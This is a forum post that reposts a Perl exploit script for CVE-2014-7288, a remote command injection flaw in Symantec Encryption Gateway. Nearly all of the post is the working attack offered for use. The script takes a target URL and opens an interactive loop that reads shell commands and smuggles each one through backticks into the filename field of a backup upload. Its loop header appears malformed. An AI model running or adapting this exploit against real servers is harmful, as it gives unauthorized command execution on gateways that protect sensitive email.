Jump to content
Aerosol

Symantec Encryption Gateway Remote Command Injection

By Aerosol, in Exploituri

Recommended Posts

Aerosol Newbie

Aerosol

Posted
Posted 

#!/usr/bin/perl -w

use LWP::UserAgent;

# Vantage Point Security Advisory 2014-007
# Title: Symantec Encryption Management Server - Remote Command 
Injection Exploit
# CVE: CVE-2014-7288
# Vendor: Symantec
# Affected Product: Symantec Encryption Gateway
# Affected Versions: < 3.2.0 MP6
# Product Website: 
http://www.symantec.com/en/sg/gateway-email-encryption/
# Exploit Info : https://www.exploit-db.com/exploits/35949/
# Author: Mohammad Reza Espargham
# Linkedin    :   https://ir.linkedin.com/in/rezasp
# E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website     :   www.reza.es
# Twitter     :   https://twitter.com/rezesp
# FaceBook    :   https://www.facebook.com/mohammadreza.espargham

if (($#ARGV + 1) != 1)
{
     printf "   Usage: \n \t$0 <Target>\n";
     printf "\t$0 http://target.com/\n\n";
     exit(1);
}

chomp($target=$ARGV[0]);

if($target !~ /http:\/\//) { $target = "http://$target"; }

my $ua = LWP::UserAgent->new;
$ua->timeout(10);
my $url = "$target/omc/uploadBackup.event";

for(
{
     print "shell : ";
     chomp($cmd=<STDIN>);
     my $response = $ua->post( $url,
         Content_Type => 'form-data',
         name => "file",
         Content => [ filename => "test123|`$cmd`|-whatever.tar.gz.pgp" ]
     );
     print "\n".$response->content;
}

Source

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...